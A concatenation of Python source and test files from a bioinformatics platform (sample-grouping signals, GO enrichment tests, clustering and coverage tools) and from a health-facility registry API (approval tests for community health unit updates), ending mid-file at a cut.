if 'name' in field_schema and 'type' in field_schema and field_schema['name'] in fields:
field = fields[field_schema['name']]
if field_schema['type'].startswith('data:'):
input_objects.append(field)
if field_schema['type'].startswith('list:data:'):
input_objects.extend(field)
sample_query = Sample.objects.filter(data__id__in=input_objects).distinct()
if sample_query.count() == 1:
sample = sample_query.first()
else:
des_schema = DescriptorSchema.objects.get(slug=instance.process.flow_collection)
sample = Sample.objects.create(
contributor=instance.contributor,
descriptor_schema=des_schema,
name=instance.name,
)
for permission in list(zip(*sample._meta.permissions))[0]: # pylint: disable=protected-access
shortcuts.assign_perm(permission, sample.contributor, sample)
# XXX: This doesn't work, because signal is triggered before Data
# object is added to collections.
# for collection in Collection.objects.filter(data=instance.pk):
# sample.collections.add(collection)
sample.data.add(instance)
@receiver(pre_delete, sender=Data)
def add_pre_delete_handler(sender, instance, **kwargs):
"""Delete Sample when last Data object is deleted."""
try:
sample = Sample.objects.get(data=instance.pk)
except Sample.DoesNotExist: # pylint: disable=no-member
return
if sample.data.count() == 1: # last Data object will be just deleted
sample.delete()
```
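The `post_save` handler above attaches a new `Data` object to an existing `Sample` only when all of its input objects resolve to a single sample; otherwise it creates a fresh one. A simplified sketch of that grouping rule, using plain dictionaries instead of Django querysets (all names here are illustrative):
```python
# Illustrative only: `samples_by_data` is a hypothetical mapping from an
# input Data id to the id of the Sample it belongs to.
def resolve_sample(input_ids, samples_by_data):
    """Return the shared sample id if all inputs agree, else None."""
    sample_ids = {samples_by_data[i] for i in input_ids if i in samples_by_data}
    if len(sample_ids) == 1:
        return sample_ids.pop()  # reuse the single shared sample
    return None                  # caller creates a new sample instead

# Both inputs already live in sample 7, so the new object joins sample 7.
assert resolve_sample([1, 2], {1: 7, 2: 7}) == 7
# Inputs spread over two samples (or none): a new sample is created.
assert resolve_sample([1, 3], {1: 7, 3: 9}) is None
```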
#### File: tests/processes/test_enrichment.py
```python
from resolwe_bio.utils.test import BioProcessTestCase
class EnrichmentProcessorTestCase(BioProcessTestCase):
def test_go_enrichment_dicty(self):
inputs = {'src': 'ontology_dicty_cropped.obo.gz'}
ontology = self.run_process('upload-obo', inputs)
inputs = {'src': 'gaf_dicty_cropped.gz'}
annotation = self.run_process('upload-gaf', inputs)
inputs = {
'ontology': ontology.pk,
'gaf': annotation.pk,
'pval_threshold': 1,
'genes': ['DDB_G0277589', 'DDB_G0286855', 'DDB_G0267640']}
enrichment = self.run_process('goenrichment-bcm', inputs)
self.assertJSON(enrichment, enrichment.output['terms'], '', 'go_enriched_terms_dicty.json.gz')
inputs = {'src': 'purpureum_ortholog-10-28-2014.cropped.txt.gz'}
orthologues = self.run_process('upload-orthologues', inputs)
inputs = {
'ontology': ontology.pk,
'gaf': annotation.pk,
'orthologues': orthologues.pk,
'pval_threshold': 1,
'genes': ['DPU_G0074602', 'DDB_G0286855', 'DPU_G0074318']}
enrichment = self.run_process('goenrichment-bcm', inputs)
self.assertJSON(enrichment, enrichment.output['terms'], '', 'go_enriched_terms_dicty.json.gz')
def test_go_enrichment_mouse(self):
inputs = {'src': 'ontology_mus_cropped.obo.gz'}
ontology = self.run_process('upload-obo', inputs)
inputs = {'src': 'gaf_mgi_cropped.gz'}
annotation = self.run_process('upload-gaf', inputs)
inputs = {
'ontology': ontology.pk,
'gaf': annotation.pk,
'pval_threshold': 1,
'genes': ['MGI:1929646', 'MGI:107486']}
enrichment = self.run_process('goenrichment-bcm', inputs)
self.assertJSON(enrichment, enrichment.output['terms'], '', 'go_enriched_terms_mouse.json.gz')
```
#### File: tests/processes/test_geneinfo.py
```python
from resolwe_bio.utils.test import BioProcessTestCase
class GIProcessorTestCase(BioProcessTestCase):
def test_gi(self):
inputs = {'src': 'mouse_gene_info.txt'}
self.run_process("upload-geneinfo", inputs)
```
#### File: tests/processes/test_reads_manipulation.py
```python
from resolwe_bio.utils.test import BioProcessTestCase
class ReadsProcessorTestCase(BioProcessTestCase):
def test_merge_reads(self):
reads = self.prepare_reads()
reads2 = self.prepare_reads()
inputs = {
'reads_1': reads.pk,
'reads_2': reads2.pk}
merged_reads = self.run_process('reads-merge', inputs)
self.assertFiles(merged_reads, 'fastq', ['paired_end_forward.fastq.gz'], compression='gzip')
self.assertFiles(merged_reads, 'fastq2', ['paired_end_reverse.fastq.gz'], compression='gzip')
self.assertFields(merged_reads, "fastqc_url", [{'file': 'fastqc/fw_reads_fastqc/fastqc_report.html',
'refs': ['fastqc/fw_reads_fastqc'],
'size': 311414}])
self.assertFields(merged_reads, "fastqc_url2", [{'file': 'fastqc/rw_reads_fastqc/fastqc_report.html',
'refs': ['fastqc/rw_reads_fastqc'],
'size': 311414}])
```
#### File: tests/unit/test_presample.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase, APIRequestFactory, force_authenticate
from rest_framework import status
from resolwe_bio.models import Sample
from resolwe_bio.views import SampleViewSet, PresampleViewSet
class PresampleTestCase(APITestCase):
def setUp(self):
self.user = get_user_model().objects.create(username='user', is_superuser=True)
self.sample = Sample.objects.create(contributor=self.user, name="Test sample")
sample_viewset = SampleViewSet()
self.sample_queryset = sample_viewset.get_queryset()
presample_viewset = PresampleViewSet()
self.presample_queryset = presample_viewset.get_queryset()
detail_url_mapping = {
'get': 'retrieve',
'put': 'update',
'patch': 'partial_update',
'delete': 'destroy',
}
list_url_mapping = {
'get': 'list',
'post': 'create',
}
self.detail_sample_view = SampleViewSet.as_view(detail_url_mapping)
self.detail_presample_view = PresampleViewSet.as_view(detail_url_mapping)
self.list_sample_view = SampleViewSet.as_view(list_url_mapping)
self.list_presample_view = PresampleViewSet.as_view(list_url_mapping)
self.factory = APIRequestFactory()
@staticmethod
def get_detail_url(endpoint, pk):
return reverse('resolwebio-api:{}-detail'.format(endpoint), kwargs={'pk': pk})
@staticmethod
def get_list_url(endpoint):
return reverse('resolwebio-api:{}-list'.format(endpoint))
def test_querysets(self):
self.assertEqual(self.sample_queryset.count(), 0)
self.assertEqual(self.presample_queryset.count(), 1)
self.sample.presample = False # mark sample as annotated
self.sample.save()
self.assertEqual(self.sample_queryset.count(), 1)
self.assertEqual(self.presample_queryset.count(), 0)
def test_upgrade_presample(self):
"""`Presample` can be transformed into `Sample`"""
url = self.get_detail_url('presample', self.sample.pk)
request = self.factory.patch(url, {'presample': False}, format='json')
force_authenticate(request, user=self.user)
response = self.detail_presample_view(request, pk=self.sample.pk)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.sample.refresh_from_db()
self.assertFalse(self.sample.presample)
def test_create_presample(self):
"""Test create `Presample`"""
url = self.get_list_url('presample')
request = self.factory.post(url, {'name': 'New presample'}, format='json')
force_authenticate(request, user=self.user)
response = self.list_presample_view(request)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
presample = Sample.objects.last()
self.assertEqual(presample.name, 'New presample')
self.assertEqual(presample.presample, True)
def test_create_sample(self):
"""Test create `Sample`"""
url = self.get_list_url('sample')
request = self.factory.post(url, {'name': 'New sample'}, format='json')
force_authenticate(request, user=self.user)
response = self.list_sample_view(request)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
sample = Sample.objects.last()
self.assertEqual(sample.name, 'New sample')
self.assertEqual(sample.presample, False)
def test_revert_sample(self):
"""`Sample` cannot be reverted back in to `Presample`"""
self.sample.presample = False
self.sample.save()
url = self.get_detail_url('sample', self.sample.pk)
request = self.factory.patch(url, {'presample': False}, format='json')
force_authenticate(request, user=self.user)
response = self.detail_sample_view(request, pk=self.sample.pk)
# `response.content` is "A server error occurred.", but this is OK,
# because the request is treated as one with no data (after `presample`
# is removed), which is why the status code is 204.
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.sample.refresh_from_db()
self.assertFalse(self.sample.presample)
def test_wrong_endpoint(self):
"""`Sample` cannot be changed through `Presample` endpoint"""
self.sample.presample = False
self.sample.save()
url = self.get_detail_url('presample', self.sample.pk)
request = self.factory.patch(url, {'presample': False}, format='json')
force_authenticate(request, user=self.user)
response = self.detail_presample_view(request, pk=self.sample.pk)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.sample.refresh_from_db()
self.assertFalse(self.sample.presample)
```
#### File: resolwe_bio/tools/genehcluster.py
```python
from __future__ import absolute_import, division, print_function
import argparse
import json
import numpy as np
from scipy.stats import spearmanr
from scipy.spatial.distance import pdist, squareform
# Import before Orange to avoid namespace conflicts
import utils
from Orange.clustering.hierarchical import HierarchicalClustering, AVERAGE, SINGLE, COMPLETE
from Orange.core import SymMatrix
parser = argparse.ArgumentParser(description='Hierarchical clustering of expression time courses.')
parser.add_argument('etc_files', nargs='+', help='etc files')
parser.add_argument('-e', '--expids', nargs='+', default=[], help='experiment ids')
parser.add_argument('-g', '--genes', nargs='+', default=[], help='subset of gene ids')
parser.add_argument('-d', '--dstfunc', default='pearson', help='distance function')
parser.add_argument('-l', '--linkage', default='average', help='clustering linkage function')
args = parser.parse_args()
distance_map = {
'spearman': lambda m: 0.5 - spearmanr(m, axis=1)[0] / 2.,
'pearson': lambda m: 0.5 - np.corrcoef(m) / 2.,
'euclidean': lambda m: squareform(pdist(m, 'euclidean')),
'manhattan': lambda m: squareform(pdist(m, 'cityblock')),
}
linkage_map = {
'average': AVERAGE,
'single': SINGLE,
'complete': COMPLETE
}
if args.dstfunc not in distance_map:
raise ValueError("Invalid distance function {}".format(args.dstfunc))
if args.linkage not in linkage_map:
raise ValueError("Invalid clustering linkage function {}".format(args.linkage))
if not args.expids or len(args.expids) != len(args.etc_files):
raise ValueError("Number of experiment ids must match the number of files")
etcs = []
timepoints = set()
# read data
for i, fname in enumerate(args.etc_files):
etcjson = json.load(utils.gzopen(fname))
tps = etcjson['etc']['timePoints']
expid = args.expids[i]
if not all(tps[i] <= tps[i + 1] for i in range(len(tps) - 1)):
raise ValueError("Timepoints should be ordered")
etc = {'genes': {}, 'experiment': expid, 'timePoints': np.array(tps)}
timepoints.update(tps)
for gene in args.genes:
if gene in etcjson['etc']['genes']:
etc['genes'][gene] = np.array(etcjson['etc']['genes'][gene])
etcs.append(etc)
timepoints = np.array(sorted(timepoints))
series, info = [], []
# interpolate missing timepoints
for etc in etcs:
if not np.array_equal(timepoints, etc['timePoints']):
for gene, points in etc['genes'].iteritems():
series.append(np.interp(timepoints, etc['timePoints'], points))
info.append((gene, etc['experiment']))
else:
for gene, points in etc['genes'].iteritems():
series.append(points)
info.append((gene, etc['experiment']))
matrix = distance_map[args.dstfunc](np.array(series))
matrix[np.isnan(matrix)] = np.nanmax(matrix)
matrix[matrix < 0] = 0.
matrix = SymMatrix([list(x) for x in matrix])
clustering = HierarchicalClustering()
clustering.linkage = linkage_map[args.linkage]
clustering.overwrite_matrix = 1
root = clustering(matrix)
def dendrogram(cluster):
"""Generate dendrogram structure."""
res = {}
q = [[cluster, res], ]
while len(q) > 0:
old, new = q.pop(0)
if old.branches:
new['left'] = {}
new['right'] = {}
new['height'] = old.height
q.append([old.left, new['left']])
q.append([old.right, new['right']])
else:
new['height'] = old.height
new['gene'] = info[old[0]][0]
new['experiment'] = info[old[0]][1]
return res
dend = dendrogram(root)
print(json.dumps({'clustering': {'tree': dend}}, separators=(',', ':')))
```
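A note on the `distance_map` used above: the Pearson and Spearman entries rescale a correlation coefficient in [-1, 1] to a distance in [0, 1], so perfectly correlated time courses cluster at distance 0 and anti-correlated ones at distance 1. A small standalone illustration (not part of the tool):
```python
import numpy as np

m = np.array([
    [1.0, 2.0, 3.0, 4.0],  # rising series
    [2.0, 4.0, 6.0, 8.0],  # same shape, scaled: correlation +1
    [4.0, 3.0, 2.0, 1.0],  # mirror image: correlation -1
])
dist = 0.5 - np.corrcoef(m) / 2.0
print(np.round(dist, 3))
# [[0. 0. 1.]
#  [0. 0. 1.]
#  [1. 1. 0.]]
```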
#### File: resolwe_bio/tools/xtabcoverage.py
```python
from __future__ import absolute_import, division, print_function
import argparse
import csv
import re
import sys
import utils
parser = argparse.ArgumentParser(
description='Create BEDGRAPH coverage file for a tab file w.r.t. given GFF3 annotations.')
parser.add_argument('--tab', dest='tab_file', help='Tab file')
parser.add_argument('--tab-coverage-col', dest='tab_col_val', help='Tab column with coverage value')
parser.add_argument('--gff3', dest='gff3_file', help='GFF3 file')
args = parser.parse_args()
# Fetch gene ids and their expressions from tab file
with utils.gzopen(args.tab_file) as f:
rdr = csv.reader(f, delimiter='\t')
next(rdr)  # skip header
tab_vals = {row[0]: float(row[int(args.tab_col_val)]) for row in rdr}
genes = {}
# Fetch gene regions and chromosomes they belong to
with open(args.gff3_file, 'r') as f:
rdr = csv.reader(f, delimiter='\t')
gene_id_regex = re.compile(r'ID=([A-Za-z0-9_]+);')
for i, row in enumerate(rdr):
# skip GFF3 headers
if row[0][0:2] == '##':
continue
# skip rows that are neither mRNA nor transcript features
if row[2] not in ('mRNA', 'transcript'):
continue
gene_id = gene_id_regex.search(row[8])
if gene_id is None:
print("No gene id found in line %d" % i)
sys.exit(1)
else:
gene_id = gene_id.groups()[0]
region = (int(row[3]), int(row[4]))
if gene_id in genes:
genes[gene_id]['regions'].append(region)
else:
genes[gene_id] = {
'regions': [region],
'chr': row[0]
}
# Create a bedgraph (still with overlapping regions)
bedgraph = []
for gid in set(genes.keys()) & set(tab_vals.keys()): # pylint: disable=consider-iterating-dictionary
if tab_vals[gid] == 0.0:
continue
expr_level = tab_vals[gid]
for region in sorted(genes[gid]['regions']):
bed_data = (genes[gid]['chr'], region[0], region[1], expr_level, gid)
bedgraph.append(bed_data)
bedgraph.sort(key=lambda t: (t[0], int(t[1]), int(t[2])))
# Flatten regions that overlap
last_reg_idx = len(bedgraph) - 1
unique_regions = []
i = 0
while i <= last_reg_idx:
overlap_reg_chr = bedgraph[i][0]
overlap_reg_start = bedgraph[i][1]
overlap_reg_end = bedgraph[i][2]
# working index set - indices of those regions that overlap in some continuous region
ws_idxs = [i]
j = i + 1
while j <= last_reg_idx and bedgraph[j][1] <= overlap_reg_end and bedgraph[j][0] == overlap_reg_chr:
ws_idxs.append(j)
overlap_reg_end = max(overlap_reg_end, bedgraph[j][2])
i = j
j += 1
def which_start(point):
"""Return indices of regions with $point as starting point."""
return [_idx for _idx in ws_idxs if bedgraph[_idx][1] == point]
def which_end(point):
"""Return indices of regions with $point as ending point."""
return [_idx for _idx in ws_idxs if bedgraph[_idx][2] == point]
if len(ws_idxs) > 1:
starts = [bedgraph[_idx][1] for _idx in ws_idxs]
ends = [bedgraph[_idx][2] for _idx in ws_idxs]
points = list(set(starts + ends))
# active index set - regions that are active in the current working index set for a given point p
# (that is, p lies in all regions whose indices are in the active set)
active_idxs = []
def active_expr_avg():
"""Compute average expression."""
return sum(bedgraph[_idx][3] for _idx in active_idxs) / len(active_idxs)
# Crunch overlapping regions into unique, flat parts.
prev_p = None
for p in sorted(points):
start_idx = which_start(p)
end_idx = which_end(p)
n_start = len(start_idx)
n_end = len(end_idx)
# current point is a starting point of some region(s) A and an ending point of some other region(s) B
#
# mandatory ASCII art:
#
# A: --------------------
# B: -------------------------
# C: --------------------------------
# ^ ^
# prev_p p
#
# |-----------------|| <---- created unique & flat regions
# flat_1 flat_2
#
if n_start > 0 and n_end > 0:
unique_regions.append((overlap_reg_chr, prev_p, p - 1, active_expr_avg())) # flat_1
active_idxs = list(set(active_idxs + start_idx))
unique_regions.append((overlap_reg_chr, p, p, active_expr_avg())) # flat_2
active_idxs = [idx for idx in active_idxs if idx not in end_idx]
prev_p = p + 1
# current point is a starting point of some region(s)
#
# mandatory ASCII art:
#
# A: ---------------------------
# B: -----------------------
# C: ------------------------------
# ^ ^
# prev_p p
#
# |---------------|
# flat_1
#
elif n_start > 0:
if prev_p is not None:
unique_regions.append((overlap_reg_chr, prev_p, p - 1, active_expr_avg()))
active_idxs = list(set(active_idxs + start_idx))
prev_p = p
# current point is an ending point of some region(s)
#
# mandatory ASCII art:
#
# A: ---------------------
# B: ---------------
# C: --------------------------
# ^ ^
# prev_p p
#
# |-----|
# flat_1
#
elif n_end > 0:
unique_regions.append((overlap_reg_chr, prev_p, p, active_expr_avg()))
active_idxs = [idx for idx in active_idxs if idx not in end_idx]
prev_p = p + 1
else:
# No overlapping for this feature; can be safely added to unique regions.
unique_regions.append((overlap_reg_chr, overlap_reg_start, overlap_reg_end, bedgraph[i][3]))
i += 1
print('\n'.join('\t'.join(map(str, bg_line[0:4])) for bg_line in unique_regions))
sys.exit(0)
```
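The flattening loop above is essentially a sweep over region boundaries: on every flat segment it reports the average expression of all regions covering that segment. A condensed sketch of the same idea (assumed, simplified names; it ignores chromosomes and the zero-expression filter):
```python
def flatten(intervals):
    """intervals: list of (start, end, value); return (start, end, mean) rows."""
    # Boundary events: each start, plus each end + 1 (segments are inclusive).
    events = sorted({p for s, e, _ in intervals for p in (s, e + 1)})
    out = []
    for left, right in zip(events, events[1:]):
        # Regions covering the whole flat segment [left, right - 1].
        active = [v for s, e, v in intervals if s <= left and right - 1 <= e]
        if active:
            out.append((left, right - 1, sum(active) / len(active)))
    return out

# Two overlapping regions: the shared stretch gets the mean of both values.
print(flatten([(1, 10, 4.0), (6, 15, 8.0)]))
# [(1, 5, 4.0), (6, 10, 6.0), (11, 15, 8.0)]
```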
|
{
"source": "Jenks18/mfl_api",
"score": 2
}
|
#### File: chul/tests/test_updates.py
```python
from django.core.urlresolvers import reverse
from common.tests.test_views import LoginMixin
from common.models import ContactType, Contact
from rest_framework.test import APITestCase
from model_mommy import mommy
from facilities.models import Facility
from ..models import (
CommunityHealthUnit,
ChuUpdateBuffer,
Status,
CommunityHealthWorker,
CommunityHealthUnitContact)
class TestCHUpdatesApproval(LoginMixin, APITestCase):
def setUp(self):
self.url = reverse("api:chul:community_health_units_list")
self.approve_url = reverse("api:chul:chu_updatebufers_list")
super(TestCHUpdatesApproval, self).setUp()
def test_updates_chu_not_approved(self):
chu = mommy.make(CommunityHealthUnit)
name = '<NAME>'
data = {
"name": name,
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(chu_refetched.name, name)
self.assertEquals(0, ChuUpdateBuffer.objects.count())
def test_updates_chu_approved(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
name = '<NAME>'
data = {
"name": name,
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertNotEquals(chu_refetched.name, name)
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNone(update.contacts)
self.assertIsNone(update.workers)
def test_update_and_approve_basic_details(self):
facility = mommy.make(Facility)
status = mommy.make(Status)
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
name = '<NAME>'
data = {
"name": name,
"facility": str(facility.id),
"status": str(status.id)
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertNotEquals(chu_refetched.name, name)
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNone(update.contacts)
self.assertIsNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(chu_refetched.name, name)
self.assertEquals(chu_refetched.facility, facility)
self.assertEquals(chu_refetched.status, status)
def test_update_and_approve_chews(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthWorker.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_update_contacts(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "385235725"
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725"
}
]
data = {
'contacts': contacts
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNotNone(update.contacts)
self.assertIsNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(2, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
def test_all_updates_combined(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
name = '<NAME>'
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "385235725"
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725"
}
]
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
}
]
date_established = "2015-09-23"
date_operational = "2015-10-25"
data = {
'contacts': contacts,
'health_unit_workers': chews,
'name': name,
'date_established': date_established,
'date_operational': date_operational
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNotNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(2, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
self.assertEquals(name, chu_refetched.name)
self.assertEquals(
date_established,
chu_refetched.date_established.isoformat())
self.assertEquals(
date_operational, chu_refetched.date_operational.isoformat())
def test_reject_updates(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
name = '<NAME>'
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "385235725"
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725"
}
]
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
}
]
date_established = "2015-09-23"
date_operational = "2015-10-25"
data = {
'contacts': contacts,
'health_unit_workers': chews,
'name': name,
'date_established': date_established,
'date_operational': date_operational
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNotNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_rejected": False
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(0, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
self.assertEquals(0, CommunityHealthWorker.objects.count())
self.assertEquals(0, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
self.assertNotEquals(name, chu_refetched.name)
self.assertNotEquals(date_established, chu_refetched.date_established)
self.assertNotEquals(date_operational, chu_refetched.date_operational)
def test_approve_chew_updates_with_ids(self):
chu = mommy.make(CommunityHealthUnit)
chew_1 = mommy.make(CommunityHealthWorker, health_unit=chu)
chew_2 = mommy.make(CommunityHealthWorker, health_unit=chu)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
"id": str(chew_1.id),
'is_incharge': True,
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
'is_incharge': False,
"id": str(chew_2.id)
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_approve_chew_updates_with_ids_no_id_no_and_is_incharge(self):
chu = mommy.make(CommunityHealthUnit)
chew_1 = mommy.make(CommunityHealthWorker, health_unit=chu)
chew_2 = mommy.make(CommunityHealthWorker, health_unit=chu)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
"id": str(chew_1.id),
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
"id": str(chew_2.id)
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_approve_chew_updates_without_ids(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
'is_incharge': True,
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
'is_incharge': False,
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_contacts_with_ids(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
contact_1 = mommy.make(
Contact, contact="3852357254", contact_type=contact_type)
contact_2 = mommy.make(
Contact, contact="385235725", contact_type=contact_type_2)
chu_contact_1 = mommy.make(
